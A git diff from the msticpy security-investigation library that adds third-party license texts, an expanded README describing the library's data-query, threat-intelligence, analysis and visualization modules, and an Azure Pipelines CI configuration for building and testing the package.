+   2. Subject to the terms and conditions of this License Agreement, PSF hereby grants Licensee a nonexclusive, royalty-free, world-wide license to reproduce, analyze, test, perform and/or display publicly, prepare derivative works, distribute, and otherwise use Python alone or in any derivative version, provided, however, that PSF's License Agreement and PSF's notice of copyright, i.e., "Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006 Python Software Foundation; All Rights Reserved" are retained in Python alone or in any derivative version prepared by Licensee.
+
+   3. In the event Licensee prepares a derivative work that is based on or incorporates Python or any part thereof, and wants to make the derivative work available to others as provided herein, then Licensee hereby agrees to include in any such work a brief summary of the changes made to Python.
+
+   4. PSF is making Python available to Licensee on an "AS IS" basis. PSF MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, PSF MAKES NO AND DISCLAIMS ANY REPRESENTATION OR WARRANTY OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT THE USE OF PYTHON WILL NOT INFRINGE ANY THIRD PARTY RIGHTS.
+
+   5. PSF SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON FOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS A RESULT OF MODIFYING, DISTRIBUTING, OR OTHERWISE USING PYTHON, OR ANY DERIVATIVE THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF.
+
+   6. This License Agreement will automatically terminate upon a material breach of its terms and conditions.
+
+   7. Nothing in this License Agreement shall be deemed to create any relationship of agency, partnership, or joint venture between PSF and Licensee. This License Agreement does not grant permission to use PSF trademarks or trade name in a trademark sense to endorse or promote products or services of Licensee, or any third party.
+
+   8. By copying, installing or otherwise using Python, Licensee agrees to be bound by the terms and conditions of this License Agreement. BEOPEN.COM LICENSE AGREEMENT FOR PYTHON 2.0
+
+BEOPEN PYTHON OPEN SOURCE LICENSE AGREEMENT VERSION 1
+
+   1. This LICENSE AGREEMENT is between BeOpen.com ("BeOpen"), having an office at 160 Saratoga Avenue, Santa Clara, CA 95051, and the Individual or Organization ("Licensee") accessing and otherwise using this software in source or binary form and its associated documentation ("the Software").
+
+   2. Subject to the terms and conditions of this BeOpen Python License Agreement, BeOpen hereby grants Licensee a non-exclusive, royalty-free, world-wide license to reproduce, analyze, test, perform and/or display publicly, prepare derivative works, distribute, and otherwise use the Software alone or in any derivative version, provided, however, that the BeOpen Python License is retained in the Software, alone or in any derivative version prepared by Licensee.
+
+   3. BeOpen is making the Software available to Licensee on an "AS IS" basis. BEOPEN MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, BEOPEN MAKES NO AND DISCLAIMS ANY REPRESENTATION OR WARRANTY OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT THE USE OF THE SOFTWARE WILL NOT INFRINGE ANY THIRD PARTY RIGHTS.
+
+   4. BEOPEN SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF THE SOFTWARE FOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS A RESULT OF USING, MODIFYING OR DISTRIBUTING THE SOFTWARE, OR ANY DERIVATIVE THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF.
+
+   5. This License Agreement will automatically terminate upon a material breach of its terms and conditions.
+
+   6. This License Agreement shall be governed by and interpreted in all respects by the law of the State of California, excluding conflict of law provisions. Nothing in this License Agreement shall be deemed to create any relationship of agency, partnership, or joint venture between BeOpen and Licensee. This License Agreement does not grant permission to use BeOpen trademarks or trade names in a trademark sense to endorse or promote products or services of Licensee, or any third party. As an exception, the "BeOpen Python" logos available at http://www.pythonlabs.com/logos.html may be used according to the permissions granted on that web page.
+
+   7. By copying, installing or otherwise using the software, Licensee agrees to be bound by the terms and conditions of this License Agreement. CNRI OPEN SOURCE LICENSE AGREEMENT (for Python 1.6b1) IMPORTANT: PLEASE READ THE FOLLOWING AGREEMENT CAREFULLY.
+
+BY CLICKING ON "ACCEPT" WHERE INDICATED BELOW, OR BY COPYING, INSTALLING OR OTHERWISE USING PYTHON 1.6, beta 1 SOFTWARE, YOU ARE DEEMED TO HAVE AGREED TO THE TERMS AND CONDITIONS OF THIS LICENSE AGREEMENT.
+
+   1. This LICENSE AGREEMENT is between the Corporation for National Research Initiatives, having an office at 1895 Preston White Drive, Reston, VA 20191 ("CNRI"), and the Individual or Organization ("Licensee") accessing and otherwise using Python 1.6, beta 1 software in source or binary form and its associated documentation, as released at the www.python.org Internet site on August 4, 2000 ("Python 1.6b1").
+
+   2. Subject to the terms and conditions of this License Agreement, CNRI hereby grants Licensee a non-exclusive, royalty-free, world-wide license to reproduce, analyze, test, perform and/or display publicly, prepare derivative works, distribute, and otherwise use Python 1.6b1 alone or in any derivative version, provided, however, that CNRIs License Agreement is retained in Python 1.6b1, alone or in any derivative version prepared by Licensee.
+
+   Alternately, in lieu of CNRIs License Agreement, Licensee may substitute the following text (omitting the quotes): "Python 1.6, beta 1, is made available subject to the terms and conditions in CNRIs License Agreement. This Agreement may be located on the Internet using the following unique, persistent identifier (known as a handle): 1895.22/1011. This Agreement may also be obtained from a proxy server on the Internet using the URL:http://hdl.handle.net/1895.22/1011".
+
+   3. In the event Licensee prepares a derivative work that is based on or incorporates Python 1.6b1 or any part thereof, and wants to make the derivative work available to the public as provided herein, then Licensee hereby agrees to indicate in any such work the nature of the modifications made to Python 1.6b1.
+
+   4. CNRI is making Python 1.6b1 available to Licensee on an "AS IS" basis. CNRI MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, CNRI MAKES NO AND DISCLAIMS ANY REPRESENTATION OR WARRANTY OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT THE USE OF PYTHON 1.6b1 WILL NOT INFRINGE ANY THIRD PARTY RIGHTS.
+
+   5. CNRI SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF THE SOFTWARE FOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS A RESULT OF USING, MODIFYING OR DISTRIBUTING PYTHON 1.6b1, OR ANY DERIVATIVE THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF.
+
+   6. This License Agreement will automatically terminate upon a material breach of its terms and conditions.
+
+   7. This License Agreement shall be governed by and interpreted in all respects by the law of the State of Virginia, excluding conflict of law provisions. Nothing in this License Agreement shall be deemed to create any relationship of agency, partnership, or joint venture between CNRI and Licensee. This License Agreement does not grant permission to use CNRI trademarks or trade name in a trademark sense to endorse or promote products or services of Licensee, or any third party.
+
+   8. By clicking on the "ACCEPT" button where indicated, or by copying, installing or otherwise using Python 1.6b1, Licensee agrees to be bound by the terms and conditions of this License Agreement. ACCEPT CWI LICENSE AGREEMENT FOR PYTHON 0.9.0 THROUGH 1.2
+
+Copyright (c) 1991 - 1995, Stichting Mathematisch Centrum Amsterdam, The Netherlands. All rights reserved.
+
+Permission to use, copy, modify, and distribute this software and its documentation for any purpose and without fee is hereby granted, provided that the above copyright notice appear in all copies and that both that copyright notice and this permission notice appear in supporting documentation, and that the name of Stichting Mathematisch Centrum or CWI not be used in advertising or publicity pertaining to distribution of the software without specific, written prior permission.
+
+STICHTING MATHEMATISCH CENTRUM DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN NO EVENT SHALL STICHTING MATHEMATISCH CENTRUM BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+filelock 3.4.2 - Unlicense
+
+
+copyright f'2014- date.today().year, company
+
+This is free and unencumbered software released into the public domain.
+
+Anyone is free to copy, modify, publish, use, compile, sell, or distribute this software, either in source code form or as a compiled binary, for any purpose, commercial or non-commercial, and by any means.
+
+In jurisdictions that recognize copyright laws, the author or authors of this software dedicate any and all copyright interest in the software to the public domain. We make this dedication for the benefit of the public at large and to the detriment of our heirs and
+
+successors. We intend this dedication to be an overt act of relinquishment in perpetuity of all present and future rights to this software under copyright law.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+For more information, please refer to <http://unlicense.org/>
+
+---------------------------------------------------------
+
diff --git a/README.md b/README.md
index 5404224d9..d300c5083 100644
--- a/README.md
+++ b/README.md
@@ -1,90 +1,343 @@
 # MSTIC Jupyter and Python Security Tools
 
-Microsoft Threat Intelligence Python Security Package:
+[![Build Status](https://dev.azure.com/mstic-detections/mstic-jupyter/_apis/build/status/microsoft.msticpy?branchName=main)](https://dev.azure.com/mstic-detections/mstic-jupyter/_build/latest?definitionId=14&branchName=main)
+[![Downloads](https://pepy.tech/badge/msticpy)](https://pepy.tech/project/msticpy)
 
-## sectools
-This subpackage contains several modules helpful for working on security
-investigations and hunting:
+Microsoft Threat Intelligence Python Security Tools.
+
+**msticpy** is a library for InfoSec investigation and hunting
+in Jupyter Notebooks. It includes functionality to:
+
+- query log data from multiple sources
+- enrich the data with Threat Intelligence, geolocations and Azure
+  resource data
+- extract Indicators of Activity (IoA) from logs and unpack encoded data
+- perform sophisticated analysis such as anomalous session detection and
+  time series decomposition
+- visualize data using interactive timelines, process trees and
+  multi-dimensional Morph Charts
+
+It also includes some time-saving notebook tools such as widgets to
+set query time boundaries, select and display items from lists, and
+configure the notebook environment.
+
+<img src="./docs/source/visualization/_static/Timeline-08.png"
+alt="Timeline" title="Msticpy Timeline Control" height="300" />
+
+The **msticpy** package was initially developed to support
+[Jupyter Notebooks](https://jupyter-notebook-beginner-guide.readthedocs.io/en/latest/)
+authoring for
+[Azure Sentinel](https://azure.microsoft.com/en-us/services/azure-sentinel/).
+While Azure Sentinel is still a big focus of our work, we are
+extending the data query/acquisition components to pull log data from
+other sources (currently Splunk, Microsoft Defender for Endpoint and
+Microsoft Graph are supported but we
+are actively working on support for data from other SIEM platforms).
+Most of the components can also be used with data from any source. Pandas
+DataFrames are used as the ubiquitous input and output format of almost
+all components. There is also a data provider to make it easy to and process
+data from local CSV files and pickled DataFrames.
+
+The package addresses three central needs for security investigators
+and hunters:
+
+- Acquiring and enriching data
+- Analyzing data
+- Visualizing data
+
+We welcome feedback, bug reports, suggestions for new features and contributions.
+
+## Installing
+
+For core install:
+
+`pip install msticpy`
+
+If you are using *MSTICPy* with Azure Sentinel you should install with
+the "azsentinel" extra package:
+
+`pip install msticpy[azsentinel]`
+
+or for the latest dev build
+
+`pip install git+https://github.com/microsoft/msticpy`
+
+## Upgrading
+
+To upgrade msticpy to the latest public non-beta release, run:
+
+`pip install --upgrade msticpy`
+
+Note it is good practice to copy your msticpyconfig.yaml and store it on your disk but outside of your msticpy folder, referencing it in an environment variable. This prevents you from losing your configurations every time you update your msticpy installation.
+
+## Documentation
+
+Full documentation is at [ReadTheDocs](https://msticpy.readthedocs.io/en/latest/)
+
+Sample notebooks for many of the modules are in the
+[docs/notebooks](https://github.com/microsoft/msticpy/blob/master/docs/notebooks)
+folder and accompanying notebooks.
+
+You can also browse through the sample notebooks referenced at the end of this document
+to see some of the functionality used in context. You can play with some of the package
+functions in this interactive demo on mybinder.org.
+
+[![Binder](https://mybinder.org/badge_logo.svg)](https://mybinder.org/v2/gh/Azure/Azure-Sentinel-Notebooks/master?filepath=%2Fnbdemo%2Fmsticpy%20demo.ipynb)
+
+---
+
+## Log Data Acquisition
+
+QueryProvider is an extensible query library targeting Azure Sentinel/Log Analytics,
+Splunk, OData
+and other log data sources. It also has special support for
+[Mordor](https://github.com/OTRF/mordor) data sets and using local data.
+
+Built-in parameterized queries allow complex queries to be run
+from a single function call. Add your own queries using a simple YAML
+schema.
+
+[Data Queries Notebook](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/Data_Queries.ipynb)
+
+## Data Enrichment
+
+### Threat Intelligence providers
+
+The TILookup class can lookup IoCs across multiple TI providers. built-in
+providers include AlienVault OTX, IBM XForce, VirusTotal and Azure Sentinel.
+
+The input can be a single IoC observable or a pandas DataFrame containing
+multiple observables. Depending on the provider, you may require an account
+and an API key. Some providers also enforce throttling (especially for free
+tiers), which might affect performing bulk lookups.
+
+[TIProviders](https://msticpy.readthedocs.io/en/latest/data_acquisition/TIProviders.html)
+and
+[TILookup Usage Notebook](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/TIProviders.ipynb)
+
+### GeoLocation Data
+
+The GeoIP lookup classes allow you to match the geo-locations of IP addresses
+using either:
+
+- GeoLiteLookup - Maxmind Geolite (see <https://www.maxmind.com>)
+- IPStackLookup  - IPStack (see <https://ipstack.com>)
+
+<img src="./docs/source/visualization/_static/FoliumMap-01.png"
+  alt="Folium map"
+  title="Plotting Geo IP Location" height="200" />
+
+[GeoIP Lookup](https://msticpy.readthedocs.io/en/latest/data_acquisition/GeoIPLookups.html)
+and
+[GeoIP Notebook](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/GeoIPLookups.ipynb)
+
+### Azure Resource Data, Storage and Azure Sentinel API
+
+
+The AzureData module contains functionality for enriching data regarding Azure host
+details with additional host details exposed via the Azure API. The AzureSentinel
+module allows you to query incidents, retrieve detector and hunting
+queries. AzureBlogStorage lets you read and write data from blob storage.
+
+[Azure Resource APIs](https://msticpy.readthedocs.io/en/latest/data_acquisition/AzureData.html),
+[Azure Sentinel APIs](https://msticpy.readthedocs.io/en/latest/data_acquisition/Sentinel.html),
+[Azure Storage](https://msticpy.readthedocs.io/en/latest/data_acquisition/AzureBlobStorage.html)
+## Security Analysis
+
+This subpackage contains several modules helpful for working on security investigations and hunting:
+
+### Anomalous Sequence Detection
+
+Detect unusual sequences of events in your Office, Active Directory or other log data.
+You can extract sessions (e.g. activity initiated by the same account) and identify and
+visualize unusual sequences of activity. For example, detecting an attacker setting
+a mail forwarding rule on someone's mailbox.
+
+[Anomalous Sessions](https://msticpy.readthedocs.io/en/latest/data_analysis/AnomalousSequence.html)
+and
+[Anomalous Sequence Notebook](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/AnomalousSequence.ipynb)
+
+### Time Series Analysis
+
+Time series analysis allows you to identify unusual patterns in your log data
+taking into account normal seasonal variations (e.g. the regular ebb and flow of
+events over hours of the day, days of the week, etc.). Using both analysis and
+visualization highlights unusual traffic flows or event activity for any data
+set.
+
+<img src="./docs/source/visualization/_static/TimeSeriesAnomalieswithRangeTool.png"
+alt="Time Series anomalies" title="Time Series anomalies" height="300" />
+
+[Time Series](https://msticpy.readthedocs.io/en/latest/visualization/TimeSeriesAnomalies.html)
+
+## Visualization
+
+### Event Timelines
+
+Display any log events on an interactive timeline. Using the
+[Bokeh Visualization Library](https://bokeh.org/) the timeline control enables
+you to visualize one or more event streams, interactively zoom into specific time
+slots and view event details for plotted events.
+
+<img src="./docs/source/visualization/_static/TimeLine-01.png"
+alt="Timeline" title="Msticpy Timeline Control" height="300" />
+
+[Timeline](https://msticpy.readthedocs.io/en/latest/visualization/EventTimeline.html)
+and
+[Timeline Notebook](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/EventTimeline.ipynb)
+
+### Process Trees
+
+The process tree functionality has two main components:
+
+- Process Tree creation - taking a process creation log from a host and building
+  the parent-child relationships between processes in the data set.
+- Process Tree visualization - this takes the processed output displays an interactive process tree using Bokeh plots.
+
+There are a set of utility functions to extract individual and partial trees from the processed data set.
+
+<img src="./docs/source/visualization/_static/process_tree3.png"
+alt="Process Tree"
+title="Interactive Process Tree" height="400" />
+
+[Process Tree](https://msticpy.readthedocs.io/en/latest/visualization/ProcessTree.html)
+and
+[Process Tree Notebook](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/ProcessTree.ipynb)
+
+## Data Manipulation and Utility functions
+
+### Pivot Functions
+
+Lets you use *MSTICPy* functionality in an "entity-centric" way.
+All functions, queries and lookups that relate to a particular entity type
+(e.g. Host, IpAddress, Url) are collected together as methods of that
+entity class. So, if you want to do things with an IP address, just load
+the IpAddress entity and browse its methods.
+
+[Pivot Functions](https://msticpy.readthedocs.io/en/latest/data_analysis/PivotFunctions.html)
+and
+[Pivot Functions Notebook](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/PivotFunctions.ipynb)
 ### base64unpack
-Base64 and archive (gz, zip, tar) extractor. Input can either be a single string or a specified column of a pandas dataframe. It will try to identify any base64 encoded strings and decode them. If the result looks like one of the supported archive types it will unpack the contents. The results of each decode/unpack are rechecked for further base64 content and will recurse down up to 20 levels (default can be overridden).
-Output is to a decoded string (for single string input) or a DataFrame (for dataframe input).
-[Base64Unpack Notebook](./doc/Base64Unpack.ipynb)
+
+Base64 and archive (gz, zip, tar) extractor. It will try to identify any base64 encoded
+strings and try decode them. If the result looks like one of the supported archive types it
+will unpack the contents. The results of each decode/unpack are rechecked for further
+base64 content and up to a specified depth.
+
+[Base64 Decoding](https://msticpy.readthedocs.io/en/latest/data_analysis/Base64Unpack.html)
+and
+[Base64Unpack Notebook](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/Base64Unpack.ipynb)
 
 ### iocextract
-Uses a set of builtin regular expressions to look for Indicator of Compromise (IoC) patterns. Input can be a single string or a pandas dataframe with one or more columns specified as input.
-The following types are built-in:
-- IPv4 and IPv6
-- URL
-- DNS domain
-- Hashes (MD5, SHA1, SHA256)
-- Windows file paths
-- Linux file paths (this is kind of noisy because a legal linux file path can have almost any character)
-You can modify or add to the regular expressions used at runtime.
-
-Output is a dictionary of matches (for single string input) or a DataFrame (for dataframe input).
-
-### vtlookup
-Wrapper class around Virus Total API (https://www.virustotal.com/en/documentation/public-api/).
-Input can be a single IoC observable or a pandas DataFrame containing multiple observables.
-Processing requires a Virus Total account and API key and processing performance is limited to 
-the number of requests per minute for the account type that you have.
-Support IoC Types:
-- Filehash
-- URL
-- DNS Domain
-- IPv4 Address
-
-[VTLookup Notebook](./doc/VTLookup.ipynb)
-
-### geoip
-Geographic location lookup for IP addresses.
-This module has two classes for different services:
-- GeoLiteLookup - Maxmind Geolite (see https://www.maxmind.com)
-- IPStackLookup  - IPStack (see https://ipstack.com)
-Both services offer a free tier for non-commercial use. However, 
-a paid tier will normally get you more accuracy, more detail and 
-a higher throughput rate. Maxmind geolite uses a downloadable database, 
-while IPStack is an online lookup (API key required).
-
-### eventcluster
-This module is intended to be used to summarize large numbers of 
-events into clusters of different patterns. High volume repeating 
-events can often make it difficult to see unique and interesting
-items. The module uses a pattern-based approach rather than 
-matching on exact strings - so an admin command that 
-does some maintenance on thousands of servers with a commandline such as:
-```install-update -hostname {host.fqdn} -tmp:/tmp/{GUID}/rollback```
-Will be collapsed using the pattern of the command and ignoring 
-individal host names and guids.
+
+Uses regular expressions to look for Indicator of Compromise (IoC) patterns - IP Addresses, URLs,
+DNS domains, Hashes, file paths.
+Input can be a single string or a pandas dataframe.
+
+[IoC Extraction](https://msticpy.readthedocs.io/en/latest/data_analysis/IoCExtract.html)
+and
+[IoCExtract Notebook](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/IoCExtract.ipynb)
+
+### eventcluster (experimental)
+
+This module is intended to be used to summarize large numbers of
+events into clusters of different patterns. High volume repeating
+events can often make it difficult to see unique and interesting items.
+
+<img src="./docs/source/data_analysis/_static/EventClustering_2a.png"
+  alt="Clustering"
+  title="Clustering based on command-line variability" height="400" />
+
 This is an unsupervised learning module implemented using SciKit Learn DBScan.
-[EventClustering Notebook](./doc/EventClustering.ipynb)
-
-## nbtools
-This is a collection of data access, display and utility modules 
-designed to make working with Log Analytics data in Jupyter notebooks 
-quicker and easier.
-- nbwidgets - groups common functionality such as list pickers, 
-time boundary settings, saving and retrieving
-environment variables into a single line callable command.
-- nbdisplay - functions that implement common display of things like 
-alerts, events in a slightly more consumable way than print()
-- entityschema - implements entity classes (e.g. Host, Account, IPAddress) 
-used in Log Analytics alerts and in many of these modules. 
-Each entity encaspulates one or more properties related to the entity.
-- query manager - collection of modules that implement common 
-kql/Log Analytics queries using KqlMagic
-- security_alert and security_event - encapsulation classes for alerts 
-and events. Each has a standard 'entities' property reflecting the 
-entities found in the alert or event. These can also be used as 
-meta-parameters for many of the queries. For example the query:
-```qry.list_host_logons(provs==[query_times, alert])``` will extract the
-value for the ```hostname``` query parameter from the alert.
-
-# Contributing
+
+[Event Clustering](https://msticpy.readthedocs.io/en/latest/data_analysis/EventClustering.html)
+and
+[Event Clustering Notebook](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/EventClustering.ipynb)
+
+### auditdextract
+
+Module to load and decode Linux audit logs. It collapses messages sharing the same
+message ID into single events, decodes hex-encoded data fields and performs some
+event-specific formatting and normalization (e.g. for process start events it will
+re-assemble the process command line arguments into a single string).
+
+### syslog_utils
+
+Module to support an investigation of a Linux host with only syslog logging enabled.
+This includes functions for collating host data, clustering logon events and detecting
+user sessions containing suspicious activity.
+
+### cmd_line
+
+A module to support the detection of known malicious command line activity or suspicious
+patterns of command line activity.
+
+### domain_utils
+
+A module to support investigation of domain names and URLs with functions to
+validate a domain name and screenshot a URL.
+
+### Notebook widgets
+
+These are built from the [Jupyter ipywidgets](https://ipywidgets.readthedocs.io/) collection
+and group common functionality useful in InfoSec tasks such as list pickers,
+query time boundary settings and event display into an easy-to-use format.
+
+<img src="./docs/source/visualization/_static/Widgets1.png"
+  alt="Time span Widget"
+  title="Query time setter" height="100" />
+
+<img src="./docs/source/visualization/_static/Widgets4.png"
+  alt="Alert browser"
+  title="Alert browser" height="300" />
+
+---
+
+## More Notebooks on Azure Sentinel Notebooks GitHub
+
+[Azure Sentinel Notebooks](https://github.com/Azure/Azure-Sentinel-Notebooks)
+
+Example notebooks:
+
+- [Account Explorer](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Entity%20Explorer%20-%20Account.ipynb)
+- [Domain and URL Explorer](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Entity%20Explorer%20-%20Domain%20and%20URL.ipynb)
+- [IP Explorer](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Entity%20Explorer%20-%20IP%20Address.ipynb)
+- [Linux Host Explorer](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Entity%20Explorer%20-%20Linux%20Host.ipynb)
+- [Windows Host Explorer](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Entity%20Explorer%20-%20Windows%20Host.ipynb)
+
+View directly on GitHub or copy and paste the link into [nbviewer.org](https://nbviewer.jupyter.org/)
+
+## Notebook examples with saved data
+
+See the following notebooks for more examples of the use of this package in practice:
+
+- Windows Alert Investigation in
+  [GitHub](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Sample-Notebooks/Example%20-%20Guided%20Investigation%20-%20Process-Alerts.ipynb)
+  or
+  [NbViewer](https://nbviewer.jupyter.org/github/Azure/Azure-Sentinel-Notebooks/blob/master/Sample-Notebooks/Example%20-%20Guided%20Investigation%20-%20Process-Alerts.ipynb)
+- Office 365 Exploration in
+  [GitHub](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Sample-Notebooks/Example%20-%20Guided%20Hunting%20-%20Office365-Exploring.ipynb)
+  or [NbViewer](https://nbviewer.jupyter.org/github/Azure/Azure-Sentinel-Notebooks/blob/master/Sample-Notebooks/Example%20-%20Guided%20Hunting%20-%20Office365-Exploring.ipynb)
+- Cross-Network Hunting in
+  [GitHub](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Sample-Notebooks/Example%20-%20Step-by-Step%20Linux-Windows-Office%20Investigation.ipynb)or
+  [NbViewer](https://nbviewer.jupyter.org/github/Azure/Azure-Sentinel-Notebooks/blob/master/Sample-Notebooks/Example%20-%20Step-by-Step%20Linux-Windows-Office%20Investigation.ipynb)
+
+## Supported Platforms and Packages
+
+- msticpy is OS-independent
+- Requires [Python 3.6 or later](https://www.python.org/dev/peps/pep-0494/)
+- See [requirements.txt](requirements.txt) for more details and version requirements.
+
+---
+
+## Contributing
+
+For (brief) developer guidelines, see this wiki article
+[Contributor Guidelines](https://github.com/microsoft/msticpy/wiki/Contributor-guidelines)
 
 This project welcomes contributions and suggestions.  Most contributions require you to agree to a
 Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us
-the rights to use your contribution. For details, visit https://cla.microsoft.com.
+the rights to use your contribution. For details, visit <https://cla.microsoft.com>.
 
 When you submit a pull request, a CLA-bot will automatically determine whether you need to provide
 a CLA and decorate the PR appropriately (e.g., label, comment). Simply follow the instructions
diff --git a/azure-pipelines.yml b/azure-pipelines.yml
new file mode 100644
index 000000000..a054c77f0
--- /dev/null
+++ b/azure-pipelines.yml
@@ -0,0 +1,325 @@
+# Variable 'keys.ipstack_auth' was defined in the Variables tab
+# Variable 'keys.maxmind_auth' was defined in the Variables tab
+# Variable 'PIP_CACHE_DIR' was defined in the Variables tab
+# Variable 'python.version' was defined in the Variables tab
+# Cron Schedules have been converted using UTC Time Zone and may need to be updated for your location
+# Multi-job configuration must be converted to matrix strategy: https://docs.microsoft.com/en-us/azure/devops/pipelines/process/phases?view=azure-devops&tabs=yaml#multi-job-configuration
+trigger:
+  branches:
+    include:
+    - main
+  batch: True
+pr:
+  branches:
+    include:
+    - main
+schedules:
+- cron: 0 4 * * 1
+  branches:
+    include:
+    - main
+  always: true
+name: $(date:yyyyMMdd)$(rev:.r)
+resources:
+  repositories:
+  - repository: self
+    type: git
+    ref: main
+variables:
+  - name: prSource
+    ${{ if variables['System.PullRequest.IsFork'] }}:
+      value: fork
+    ${{ if not(variables['System.PullRequest.IsFork']) }}:
+      value: internal
+stages:
+- stage: PythonTests
+  displayName: Python build and tests
+  variables:
+    # This is run explicity so does not need to be auto-injected
+    skipComponentGovernanceDetection: true
+  jobs:
+  - job: InstallAndTestPackage
+    strategy:
+      matrix:
+        linux:
+          imageName: "ubuntu-latest"
+          python.version: '3.8'
+        mac:
+          imageName: "macos-latest"
+          python.version: '3.8'
+        windows-py36:
+          imageName: "windows-latest"
+          python.version: '3.8'
+      maxParallel: 4
+    pool:
+      vmImage: $(imageName)
+    steps:
+    # Add an alias for Windows python=>python3
+    - script: alias python='python3' pip='pip3'
+      condition: in(variables['imageName'], 'ubuntu-latest', 'macos-latest')
+    - task: UsePythonVersion@0
+      displayName: 'Use Python $(python.version)'
+      inputs:
+        versionSpec: '$(python.version)'
+    - task: Cache@2
+      displayName: Cache pip packages
+      continueOnError: True
+      inputs:
+        key: python | "$(Agent.OS)"
+        path: $(PIP_CACHE_DIR)
+        restoreKeys: python
+    - script: |
+        python -m pip install --upgrade pip wheel setuptools==56.0.0
+        python -m pip install -r requirements-all.txt
+        python -m pip install -e .
+      displayName: 'Install package and dependencies'
+    - script: |
+        python -m pip install -r $(Build.SourcesDirectory)/docs/requirements.txt
+        make html
+      env:
+        SPHINX_NOGEN: "true"
+      workingDirectory: docs
+      condition: eq(variables.imageName, 'windows-latest')
+      displayName: 'Sphinx Read the Docs build'
+    - script: |
+        mkdir ~/.msticpy
+        mkdir ~/.msticpy/mordor
+        cp $(Build.SourcesDirectory)/tests/testdata/geolite/GeoLite2-City.mmdb ~/.msticpy
+        touch ~/.msticpy/GeoLite2-City.mmdb
+        cp -r $(Build.SourcesDirectory)/tests/testdata/mordor/* ~/.msticpy/mordor
+        touch ~/.msticpy/mordor/mitre_tact_cache.pkl
+        touch ~/.msticpy/mordor/mitre_tech_cache.pkl
+        touch ~/.msticpy/mordor/mordor_cache.pkl
+      condition: ne(variables.imageName, 'windows-latest')
+      displayName: 'Prepare test dummy data - Linux'
+    - script: |
+        mkdir %USERPROFILE%\.msticpy
+        mkdir %USERPROFILE%\.msticpy\mordor
+        copy /Y $(Build.SourcesDirectory)\tests\testdata\geolite\GeoLite2-City.mmdb %USERPROFILE%\.msticpy
+        copy /Y $(Build.SourcesDirectory)\tests\testdata\mordor\* %USERPROFILE%\.msticpy\mordor
+      condition: eq(variables.imageName, 'windows-latest')
+      displayName: 'Prepare test dummy data - Windows'
+    - script: |
+        echo MSTICPYCONFIG: $(Build.SourcesDirectory)/tests/msticpyconfig-test.yaml
+        echo Env $MSTICPYCONFIG or %MSTICPYCONFIG%
+        echo Build source: $(prSource)
+        echo Env $MSTICPY_BUILD_SOURCE or %MSTICPY_BUILD_SOURCE%
+        python -m pip install --upgrade pytest pytest-azurepipelines
+        python -m pip install --upgrade pytest-cov pytest-check aiohttp nbconvert jupyter_contrib_nbextensions
+        python -m pip install --upgrade Pygments respx pytest-xdist markdown beautifulsoup4 Pillow
+        python -m pip install "pandas>=1.3.0"
+        pytest tests --junitxml=junit/test-$(variables.imageName)-$(variables.python.version)-results.xml -n auto --cov=msticpy --cov-report=xml
+      displayName: pytest
+      env:
+        MSTICPYCONFIG: $(Build.SourcesDirectory)/tests/msticpyconfig-test.yaml
+        MAXMIND_AUTH: $(keys.maxmind_auth)
